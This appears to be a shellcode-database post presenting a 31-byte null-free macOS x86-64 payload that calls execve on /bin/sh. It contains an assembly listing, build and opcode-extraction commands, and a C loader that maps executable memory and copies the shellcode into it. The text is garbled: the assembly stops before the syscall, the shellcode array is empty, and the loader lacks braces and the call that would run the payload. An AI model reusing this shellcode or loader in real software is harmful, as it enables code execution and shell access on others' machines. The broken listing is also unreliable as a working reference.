macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)

2019-02-18 19:05:16

# Title: macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
# Date: 2019-02-17
# Tested: macOS 10.14.1
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c

dev:works devuser$ sw_vers
ProductName: Mac OS X
ProductVersion: 10.14.1
BuildVersion: 18B75
dev:works devuser$ cat binsh.s
section .text
global start
; execve("//bin/sh", 0, 0)
xor rax, rax
push rax
mov rdi, 0x68732f6e69622f2f
push rdi
push rsp
pop rdi
xor rsi, rsi
mov al, 0x2
ror rax, 0x28
mov al, 0x3b
dev:works devuser$ nasm -f macho64 -o binsh.o binsh.s && ld -macosx_version_min 10.7.0 -o binsh binsh.o
dev:works devuser$ for i in $(objdump -d ./binsh.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
dev:works devuser$

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] =

int main(int argc, char **argv) {
printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));

void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

if (ptr == MAP_FAILED) {

memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;


return 0;


No fixes

In order to submit a new fix you need to be registered.